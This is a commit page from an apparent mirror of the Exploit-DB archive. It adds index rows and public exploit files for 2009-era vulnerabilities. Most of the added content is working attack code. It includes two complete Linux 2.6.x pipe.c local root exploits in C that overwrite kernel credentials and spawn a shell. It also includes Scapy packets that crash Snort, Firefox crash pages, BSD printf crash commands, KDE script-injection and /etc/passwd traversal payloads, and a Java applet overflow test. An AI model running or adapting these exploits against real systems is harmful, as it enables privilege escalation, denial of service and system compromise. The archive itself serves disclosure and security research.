bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_13_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-13 04:36:24 +00:00
parent 8aedf0ad9c
commit b809e3cca6
18 changed files with 1801 additions and 0 deletions

17
files.csv
View file

@ -30000,6 +30000,7 @@ id,file,description,date,author,platform,type,port
33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 'LunaSysMgr' Service Denial of Service Vulnerability",2009-10-13,"Townsend Ladd Harris",hardware,dos,0
33281,platforms/php/webapps/33281.txt,"Achievo 1.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0
33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 'index.php' Cross-Site Scripting and SQL Injection Vulnerabilities",2009-10-13,infosecstuff,php,webapps,0
33283,platforms/linux/dos/33283.txt,"Adobe Reader <= 9.1.3 and Acrobat COM Objects Memory Corruption Remote Code Execution Vulnerability",2009-10-13,Skylined,linux,dos,0
33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x Multiple Cross Site Scripting and Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0
33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 'run?__report' Parameter Cross Site Scripting Vulnerability",2009-10-14,"Michele Orru",java,webapps,0
33287,platforms/php/webapps/33287.txt,"bloofoxCMS 0.3.5 'search' Parameter Cross Site Scripting Vulnerability",2009-10-15,"drunken danish rednecks",php,webapps,0
@ -30021,3 +30022,19 @@ id,file,description,date,author,platform,type,port
33303,platforms/php/webapps/33303.txt,"OpenDocMan 1.2.5 search.php XSS",2009-10-21,"Amol Naik",php,webapps,0
33304,platforms/php/webapps/33304.txt,"OpenDocMan 1.2.5 user.php XSS",2009-10-21,"Amol Naik",php,webapps,0
33305,platforms/php/webapps/33305.txt,"OpenDocMan 1.2.5 view_file.php XSS",2009-10-21,"Amol Naik",php,webapps,0
33306,platforms/linux/dos/33306.txt,"Snort 2.8.5 Multiple Denial Of Service Vulnerabilities",2009-10-22,"laurent gaffie",linux,dos,0
33307,platforms/php/webapps/33307.php,"RunCMS 'forum' Parameter SQL Injection Vulnerability",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0
33308,platforms/php/webapps/33308.txt,"Sahana 0.6.2 'mod' Parameter Local File Disclosure Vulnerability",2009-10-27,"Greg Miernicki",php,webapps,0
33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 'album' Parameter Cross Site Scripting Vulnerability",2009-10-26,blake,php,webapps,0
33310,platforms/multiple/remote/33310.nse,"VMware Server <= 2.0.1,ESXi Server <= 3.5 Directory Traversal Vulnerability",2009-10-27,"Justin Morehouse",multiple,remote,0
33311,platforms/linux/remote/33311.txt,"KDE <= 4.3.2 Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0
33312,platforms/linux/dos/33312.txt,"Mozilla Firefox <= 3.5.3 Floating Point Conversion Heap Overflow Vulnerability",2009-10-27,"Alin Rad Pop",linux,dos,0
33313,platforms/linux/remote/33313.txt,"Mozilla Firefox <= 3.5.3 and SeaMonkey <= 1.1.17 'libpr0n' GIF Parser Heap Based Buffer Overflow Vulnerability",2009-10-27,regenrecht,linux,remote,0
33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 CVE-2009-3382 Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 'printf(1)' Format String Parsing Denial of Service Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x 'pipe.c' Local Privilege Escalation Vulnerability (1)",2009-11-03,"teach & xipe",linux,local,0
33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0

Can't render this file because it is too large.

12
platforms/bsd/dos/33318.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/36884/info
OpenBSD and NetBSD are prone to a denial-of-service vulnerability because they fail to properly parse format strings to the 'printf(1)' function.
An attacker can exploit this issue to cause applications using the vulnerable call to crash with a segmentation fault, denying service to legitimate users.
The following are reported vulnerable:
OpenBSD 4.6
NetBSD 5.0.1
printf %*********s 666

14
platforms/bsd/dos/33319.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/36885/info
Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
An attacker can exploit this issue to cause applications to crash with a segmentation fault, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
The following are vulnerable:
OpenBSD 4.6
NetBSD 5.0.1
The following example is available:
printf %.1100000000f 1.1

9
platforms/linux/dos/33283.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36668/info
Adobe Reader and Acrobat are prone to a remote code-execution vulnerability because they fail to properly handle certain COM objects.
An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
This issue was previously covered in BID 36638 (Adobe Reader and Acrobat October 2009 Multiple Remote Vulnerabilities), but has been given its own record to better document it.
http://www.exploit-db.com/sploits/33283.tar

25
platforms/linux/dos/33306.txt Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/36795/info
Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.
Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.
These issues affect Snort 2.8.5; other versions may also be vulnerable.
You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)
1) #only works on x86
#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
2) # works x86,x64
#/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)

13
platforms/linux/dos/33312.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/36851/info
Mozilla Firefox is prone to a heap-based buffer-overflow vulnerability.
An attacker can exploit this issue by tricking a victim into visiting a malicious webpage to execute arbitrary code and to cause denial-of-service conditions.
NOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities).
NOTE 2: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>

9
platforms/linux/dos/33314.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36866/info
Mozilla Firefox is prone to a remote memory-corruption vulnerability.
Successful exploits may allow an attacker to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html><head><script> function doe2(i) { document.getElementById('a').setAttribute('style', 'display: -moz-box; '); document.getElementById('c').style.display= 'none'; } setTimeout(doe2,500,0); </script> <style> div::first-letter {float: right; } </style> </head> <body> <div style="width: 50px; -moz-column-count: 2;"> a <span style="display: table-cell;"></span><div style="display: -moz-box; font-size: 43px;"> <span id="a"> <span style="display: -moz-box;"> <span id="c">m</span> </span> </span> </div> </div> </body> </html>

569
platforms/linux/local/33321.c Executable file
View file

@ -0,0 +1,569 @@
source: http://www.securityfocus.com/bid/36901/info
Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.
Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
/******************************************************************************
* .:: Impel Down ::.
*
* Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86)
* by teach & xipe
* Greetz goes to all our mates from #nibbles, #oldschool and #carib0u
* (hehe guyz, we would probably be high profile and mediatised el8 if we
* lost less time on trolling all day long, but we LOVE IT :)))
* Special thanks to Ivanlef0u, j0rn & pouik for being such amazing (but i
* promise ivan, one day i'll kill u :p)
*
* (C) COPYRIGHT teach & xipe, 2009
* All Rights Reserved
*
* teach@vxhell.org
* xipe@vxhell.org
*
*******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/personality.h>
/* First of all, im about to teach (hehe, just like mah nick) you mah powerful copy-and-past skillz */
// didn't really care about this. i mixed 2.6.0 to 2.6.31 :)
#define PIPE_BUFFERS (16)
struct __wait_queue_head {
int spinlock;
void *next, *prev; // struct list_head
};
struct fasync_struct { // bleh! didn't change from 2.6.0 to 2.6.31
int magic;
int fa_fd;
struct fasync_struct *fa_next;
void *file; // struct file
};
// this iz the w00t about 2.6.11 to 2.6.31
struct pipe_buf_operations {
int suce;
int *fptr[6];
};
// from 2.6.0 to 2.6.10
struct pipe_inode_info_2600_10 {
struct __wait_queue_head wait;
char *base; // !!!!!
unsigned int len; // !!!
unsigned int start; // !!!
unsigned int readers;
unsigned int writers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
};
// from 2.6.11 to 2.6.16
struct pipe_buffer_2611_16 {
void *suce;
unsigned int offset, len;
struct pipe_buf_operations *ops;
};
struct pipe_inode_info_2611_16 {
struct __wait_queue_head wait;
unsigned int nrbufs, curbuf;
struct pipe_buffer_2611_16 bufs[PIPE_BUFFERS];
void *tmp_page;
unsigned int start;
unsigned int readers;
unsigned int writers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
};
// from 2.6.17 to 2.6.19
struct pipe_buffer_2617_19 {
void *suce;
unsigned int offset, len;
struct pipe_buf_operations *ops;
unsigned int tapz;
};
struct pipe_inode_info_2617_19 {
struct __wait_queue_head wait;
unsigned int nrbufs, curbuf;
struct pipe_buffer_2617_19 bufs[PIPE_BUFFERS];
void *tmp_page;
unsigned int start;
unsigned int readers;
unsigned int writers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
void *suce;
};
// from 2.6.20 to 2.6.22
struct pipe_buffer_2620_22 {
void *suce;
unsigned int offset, len;
struct pipe_buf_operations *ops;
unsigned int tapz;
};
struct pipe_inode_info_2620_22 {
struct __wait_queue_head wait;
unsigned int nrbufs, curbuf;
void *tmp_page;
unsigned int start;
unsigned int readers;
unsigned int writers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
void *suce;
struct pipe_buffer_2620_22 bufs[PIPE_BUFFERS];
};
// AND FINALY from 2.6.23 to 2.6.31 ... :))
struct pipe_buffer_2623_31 {
void *suce;
unsigned int offset, len;
struct pipe_buf_operations *ops;
unsigned int tapz;
unsigned long tg;
};
struct pipe_inode_info_2623_31 {
struct __wait_queue_head wait;
unsigned int nrbufs, curbuf;
void *tmp_page;
unsigned int start;
unsigned int readers;
unsigned int writers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
void *suce;
struct pipe_buffer_2623_31 bufs[PIPE_BUFFERS];
};
static pid_t uid;
static gid_t gid;
static int iz_kern2600_10;
unsigned long taskstruct[1024];
void gomu_gomu_nooooo_gatling_shell(void);
int get_kern_version(void);
void map_struct_at_null(void);
void get_cur_task_and_escalate_priv(void);
void* get_null_page(void);
void error(char *s);
int is_done(int new);
static inline void *get_4kstack_top()
{
void *stack;
__asm__ __volatile__ (
"movl $0xfffff000,%%eax ;"
"andl %%esp, %%eax ;"
"movl %%eax, %0 ;"
: "=r" (stack)
);
return stack;
}
static inline void *get_8kstack_top()
{
void *stack;
__asm__ __volatile__ (
"movl $0xffffe000,%%eax ;"
"andl %%esp, %%eax ;"
"movl %%eax, %0 ;"
: "=r" (stack)
);
return stack;
}
static inline void *get_current()
{
void *cur = *(void **)get_4kstack_top();
if( ( (unsigned int *)cur >= (unsigned int *)0xc0000000 ) && ( *(unsigned int *)cur == 0 ) )
return cur;
else
cur = *(void **)get_8kstack_top();
return cur;
}
void map_struct_at_null()
{
struct pipe_inode_info_2600_10 *pipe2600_10;
struct pipe_inode_info_2611_16 *pipe2611_16;
struct pipe_inode_info_2617_19 *pipe2617_19;
struct pipe_inode_info_2620_22 *pipe2620_22;
struct pipe_inode_info_2623_31 *pipe2623_31;
struct pipe_buf_operations luffy;
FILE *f;
unsigned int *sct_addr;
unsigned int sc_addr;
char dummy;
char sname[256], pipebuf[10];
int ret, i;
void *page;
page = get_null_page();
int version = get_kern_version();
luffy.suce = 1;
for(i = 0; i < 6; i++)
luffy.fptr[i] = (int *)get_cur_task_and_escalate_priv;
// ok lets go ...
if(version >= 2600 && version <= 2610)
{
iz_kern2600_10 = 1;
/* we are going to ninja an obsolete syscall from teh sys_call_table: sys_olduname
* i don't bother to restore it after owning the kernel. implement it if u want :p
*/
// hehe as u see, his imperial majesty spender haz alwayz good trickz
f = fopen("/proc/kallsyms", "r");
if (f == NULL)
{
f = fopen("/proc/ksyms", "r");
if (f == NULL)
{
error("0hn000es. i cant open /proc/{kall,k}syms for looking after teh sys_call_table addr. maybe u should set it yourself!");
}
}
ret = 0;
while(ret != EOF)
{
ret = fscanf(f, "%p %c %s\n", (void **)&sct_addr, &dummy, sname);
if (ret == 0)
{
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp("sys_call_table", sname))
{
printf("\t\t+ sys_call_table is at %p\n",(void *)sct_addr);
fclose(f);
}
}
if(f != NULL)
{
fclose(f);
error("0hn000es. i cant get sys_olduname addr. maybe u should set it yourself!");
}
sc_addr = (unsigned int) (sct_addr + __NR_olduname*sizeof(int));
pipe2600_10 = (struct pipe_inode_info_2600_10 *) page;
memcpy(pipebuf, (char *) &sc_addr, sizeof(int));
pipe2600_10->base = pipebuf;
pipe2600_10->len = 0;
pipe2600_10->start = 0;
pipe2600_10->writers = 1;
printf("\t\t+ Structs for kernels 2.6.0 => 2.6.10 were mapped\n");
}
else if(version >= 2611 && version <= 2616)
{
pipe2611_16 = (struct pipe_inode_info_2611_16 *) page;
pipe2611_16->writers = 1;
pipe2611_16->nrbufs = 1;
for(i = 0; i < PIPE_BUFFERS; i++)
pipe2611_16->bufs[i].ops = &luffy;
printf("\t\t+ Structs for kernels 2.6.11 => 2.6.16 were mapped\n");
}
else if(version >= 2617 && version <= 2619)
{
pipe2617_19 = (struct pipe_inode_info_2617_19 *) page;
pipe2617_19->readers = 1;
pipe2617_19->nrbufs = 1;
for(i = 0; i < PIPE_BUFFERS; i++)
pipe2617_19->bufs[i].ops = &luffy;
pipe2617_19->wait.next = &pipe2617_19->wait.next;
pipe2617_19->wait.spinlock = 1;
printf("\t\t+ Structs for kernels 2.6.16 => 2.6.19 were mapped\n");
}
else if(version >= 2620 && version <= 2622)
{
pipe2620_22 = (struct pipe_inode_info_2620_22 *) page;
pipe2620_22->readers = 1;
pipe2620_22->nrbufs = 1;
for(i = 0; i < PIPE_BUFFERS; i++)
pipe2620_22->bufs[i].ops = &luffy;
pipe2620_22->wait.next = &pipe2620_22->wait.next;
pipe2620_22->wait.spinlock = 1;
printf("\t\t+ Structs for kernels 2.6.20 => 2.6.22 were mapped\n");
}
else if(version >= 2623 && version <= 2631)
{
pipe2623_31 = (struct pipe_inode_info_2623_31 *) page;
pipe2623_31->readers = 0;
pipe2623_31->nrbufs = 0;
for(i = 0; i < PIPE_BUFFERS; i++)
pipe2623_31->bufs[i].ops = &luffy;
pipe2623_31->wait.next = &pipe2623_31->wait.next;
pipe2623_31->wait.spinlock = 1;
printf("\t\t+ Structs for kernels 2.6.23 => 2.6.31 were mapped\n");
}
else
error("errrr! exploit not developped for ur kernel!");
}
int get_kern_version(void) // return something like 2600 for kernel 2.6.0, 2619 for kernel 2.6.19 ...
{
struct utsname buf;
char second[2],third[3];
int version = 2000;
if(uname(&buf) < 0)
error("can't have ur k3rn3l version. this box isn't for today :P\n");
sprintf(second, "%c", buf.release[2]);
second[1] = 0;
version += atoi(second) * 100;
third[0] = buf.release[4];
if(buf.release[5] >= '0' || buf.release[5] <= '9')
{
third[1] = buf.release[5];
third[2] = 0;
version += atoi(third);
}
else
{
third[1] = 0;
version += third[0] - '0';
}
printf("\t\t+ Kernel version %i\n", version);
return version;
}
// from our g0dz spender & julien :] lullz
void* get_null_page(void)
{
void *page;
if ((personality(0xffffffff)) != PER_SVR4)
{
page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (page != NULL)
{
page = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (page != NULL)
{
error("this box haz a motherfuckin mmap_min_addr-like stuff! burn it if u can !@#*");
}
}
else
{
if (mprotect(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) < 0)
{
free(page);
error("HELL! can't mprotect my null page !@#*. goto /dev/null !");
}
}
}
else
{
// may be we are lucky today ... :)
page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (page != NULL)
{
page = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (page != NULL)
{
error("this box haz a motherfuckin mmap_min_addr-like stuff! burn it if u can !@#*");
}
}
else
{
if (mprotect(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) // ... or not ! :(
{
free(page);
error("HELL! can't mprotect my null page !@#*. goto /dev/null !");
}
}
}
printf("\t\t+ Got null page\n");
return page;
}
void gomu_gomu_nooooo_gatling_shell(void) // sgrakkyu & twiz are el8 :))
{
char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL };
char *envp[] = { "TERM=linux", "PS1=blackbird\\$ ", "BASH_HISTORY=/dev/null",
"HISTORY=/dev/null", "history=/dev/null",
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL };
execve("/bin/sh", argv, envp);
error("hheeeehhh! unable to spawn a sh");
}
int is_done(int new)
{
static int done = 0;
if (done == 1)
return (1);
done = new;
}
volatile int done = 0;
void get_cur_task_and_escalate_priv()
{
uint32_t i;
uint32_t *task = get_current();
uint32_t *cred = 0;
for(i=0; i<0x1000; i++)
{
if( (task[i] == task[i+1]) && (task[i+1] == task[i+2]) && (task[i+2] == task[i+3]))
{
task[i] = 0;
task[i+1] = 0;
task[i+2] = 0;
task[i+3] = 0;
is_done(1);
return;
}
}
for (i = 0; i<1024; i++)
{
taskstruct[i] = task[i];
cred = (uint32_t *)task[i];
if (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {
cred++; /* Get ride of the cred's 'usage' field */
if (cred[0] == uid && cred[1] == gid
&& cred[2] == uid && cred[3] == gid
&& cred[4] == uid && cred[5] == gid
&& cred[6] == uid && cred[7] == gid)
{
/* Get root */
cred[0] = cred[2] = cred[4] = cred[6] = 0;
cred[1] = cred[3] = cred[5] = cred[7] = 0;
break;
}
}
}
is_done(1);
}
int main(int ac, char **av)
{
int fd[2];
int pid;
char tapz[4];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
map_struct_at_null();
//while (1)
{
pid = fork();
if (pid == -1)
{
perror("fork");
return (-1);
}
if (pid)
{
char path[1024];
/* I assume next opened fd will be 4 */
sprintf(path, "/proc/%d/fd/4", pid);
while (!is_done(0))
{
fd[0] = open(path, O_RDWR);
if (fd[0] != -1)
{
if(iz_kern2600_10)
{
memcpy(tapz, (char *)get_cur_task_and_escalate_priv, sizeof(int));
write(fd[0], tapz, 4);
}
close(fd[0]);
}
}
if(iz_kern2600_10)
{
syscall(__NR_olduname, NULL);
}
printf("\t\t+ Got root!\n");
gomu_gomu_nooooo_gatling_shell();
return (0);
}
while (!is_done(0))
{
if (pipe(fd) != -1)
{
close(fd[0]);
close(fd[1]);
}
}
}
}

207
platforms/linux/local/33322.c Executable file
View file

@ -0,0 +1,207 @@
source: http://www.securityfocus.com/bid/36901/info
Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.
Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
/******************************************************************************
* .:: Impel Down ::.
*
* Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86)
* by teach & xipe
* Greetz goes to all our mates from #nibbles, #oldschool and #carib0u
* (hehe guyz, we would probably be high profile and mediatised el8 if we
* lost less time on trolling all day long, but we LOVE IT :)))
* Special thanks to Ivanlef0u, j0rn & pouik for being such amazing (but i
* promise ivan, one day i'll kill u :p)
*
* (C) COPYRIGHT teach & xipe, 2009
* All Rights Reserved
*
* teach@vxhell.org
* xipe@vxhell.org
*
*******************************************************************************/
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#define PIPE_BUFFERS (16)
struct pipe_buf_operations {
int can_merge;
int *ops[10];
};
struct pipe_buffer {
int *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
struct pseudo_pipe_inode_info
{
/* Wait queue head */
/* spinlock */
int spinlock;
/* list */
int *next, *prev;
unsigned int nrbufs, curbuf;
int *page;
unsigned int readers;
unsigned int writers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
int *async_readers;
int *async_writers;
int *inode;
struct pipe_buffer bufs[PIPE_BUFFERS];
};
static pid_t uid;
static gid_t gid;
unsigned long taskstruct[1024];
static inline void *get_stack_top()
{
void *stack;
__asm__ __volatile__ (
"movl $0xffffe000,%%eax ;"
"andl %%esp, %%eax ;"
"movl %%eax, %0 ;"
: "=r" (stack)
);
return stack;
}
static inline void *get_current()
{
return *(void **)get_stack_top();
}
static void update_cred()
{
uint32_t i;
uint32_t *task = get_current(); /* Pointer to the task_struct */
uint32_t *cred = 0;
for (i = 0; i < 1024; i++)
{
taskstruct[i] = task[i];
cred = (uint32_t *)task[i];
if (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {
cred++; /* Get ride of the cred's 'usage' field */
if (cred[0] == uid && cred[1] == gid
&& cred[2] == uid && cred[3] == gid
&& cred[4] == uid && cred[5] == gid
&& cred[6] == uid && cred[7] == gid)
{
/* Get root */
cred[0] = cred[2] = cred[4] = cred[6] = 0;
cred[1] = cred[3] = cred[5] = cred[7] = 0;
break;
}
}
}
}
int is_done(int new)
{
static int done = 0;
if (done == 1)
return (1);
done = new;
}
volatile int done = 0;
void kernel_code()
{
is_done(1);
update_cred();
//exit_kernel();
}
int main(int ac, char **av)
{
int fd[2];
int pid;
int parent_pid = getpid();
char *buf;
int i,j;
struct pseudo_pipe_inode_info *pinfo = 0;
struct pipe_buf_operations ops;
buf = mmap(0, 0x1000, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, 0, 0);
printf ("buf: %p\n", buf);
pinfo->readers = 0;
pinfo->writers = 0;
for (i = 0; i < 10; i++)
ops.ops[i] = (int *)kernel_code;
for (i = 0; i < PIPE_BUFFERS; i++)
{
pinfo->bufs[i].ops = &ops;
}
i = 0;
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
//while (1)
{
pid = fork();
if (pid == -1)
{
perror("fork");
return (-1);
}
if (pid)
{
char path[1024];
char c;
/* I assume next opened fd will be 4 */
sprintf(path, "/proc/%d/fd/4", pid);
printf("Parent: %d\nChild: %d\n", parent_pid, pid);
while (!is_done(0))
{
fd[0] = open(path, O_RDWR);
if (fd[0] != -1)
{
close(fd[0]);
}
}
//system("/bin/sh");
execl("/bin/sh", "/bin/sh", "-i", NULL);
return (0);
}
while (!is_done(0))
{
if (pipe(fd) != -1)
{
close(fd[0]);
close(fd[1]);
}
}
}
}

13
platforms/linux/remote/33311.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/36845/info
KDE is prone to multiple input-validation vulnerabilities that affect 'Ark', 'IO Slaves', and 'Kmail'.
An attacker can exploit these issues by tricking an unsuspecting victim into opening a malicious file. A successful attack will allow arbitrary attacker-supplied JavaScript to run in the context of the victim running the affected application.
pydoc:[html][body][script]alert(&#039;xss&#039;)[/script][/body][/html] - fixed in 3.5.10
man:[script src="http://server/test.js"] - fixed in 3.5.10
help:[script]alert(&#039;xss&#039;)[/script]
info:/dir/[script]alert(&#039;xss&#039;)[/script]
perldoc:[body onLoad="javascript:alert(1)"]
help:/../../../../../../../../../../../etc/passwd

9
platforms/linux/remote/33313.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36855/info
Mozilla Firefox and SeaMonkey are prone to a heap-based buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code and to cause denial-of-service conditions by tricking a victim into visiting a malicious webpage.
NOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities), but has been assigned its own record to better document it.
http://www.exploit-db.com/sploits/33313.tgz

97
platforms/linux/remote/33315.java Executable file
View file

@ -0,0 +1,97 @@
source: http://www.securityfocus.com/bid/36881/info
Sun has released updates to address multiple security vulnerabilities in Java SE.
Successful exploits may allow attackers to bypass certain security restrictions, run untrusted applets with elevated privileges, execute arbitrary code, and cause denial-of-service conditions. Other attacks are also possible.
These issues are addressed in the following releases:
JDK and JRE 6 Update 17
JDK and JRE 5.0 Update 22
SDK and JRE 1.4.2_24
SDK and JRE 1.3.1_27
import java.awt.Graphics;
public class test extends java.applet.Applet {
public static Synthesizer synth;
Soundbank soundbank;
public void init()
{
String fName = "";
if(isWindows()){
System.out.println("This is Windows");
fName = repeat('/',302);
}else if(isMac()){
System.out.println("This is Mac");
fName = repeat('/',1118); // OSX Snow Leopard
}else if(isUnix()){
System.out.println("This is Unix or Linux, no current test case");
}else{
System.out.println("Your OS is not supported!!");
}
CharArrayWriter pw = new CharArrayWriter(10);
// int retaddr[] = { 0x0d, 0x0d, 0x0d, 0x0d };
int retaddr[] = { 0x41, 0x42, 0x43, 0x44, 0x30, 0x31, 0x32, 0x33, 0x0d, 0x0d, 0x0d, 0x0d };
int retlen = java.lang.reflect.Array.getLength(retaddr);
for(int x = 0; x < retlen; x++)
{
pw.write(retaddr[x]);
pw.flush();
}
pw.close();
String mal = pw.toString();
fName = "file://" + fName + mal;
try
{
synth = MidiSystem.getSynthesizer();
synth.open();
synth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName)));
}
catch(Exception e)
{
System.out.println(e);
}
}
public void paint(Graphics g)
{
g.drawString("Hello world!", 50, 25);
}
public static String repeat(char c,int i)
{
String tst = "";
for(int j = 0; j < i; j++)
{
tst = tst+c;
}
return tst;
}
public static boolean isWindows(){
String os = System.getProperty("os.name").toLowerCase();
//windows
return (os.indexOf( "win" ) >= 0);
}
public static boolean isMac(){
String os = System.getProperty("os.name").toLowerCase();
//Mac
return (os.indexOf( "mac" ) >= 0);
}
public static boolean isUnix(){
String os = System.getProperty("os.name").toLowerCase();
//linux or unix
return (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0);
}
}

140
platforms/multiple/remote/33310.nse Executable file
View file

@ -0,0 +1,140 @@
source: http://www.securityfocus.com/bid/36842/info
VMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information from the host operating system that could aid in further attacks.
description = [[
Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733), originally released by Justin Morehouse (justin.morehouse[at)gmail.com) and Tony Flick (tony.flick(at]fyrmassociates.com), and presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).
]]
---
-- @usage
-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>
--
-- @output
--| http-vmware-path-vuln:
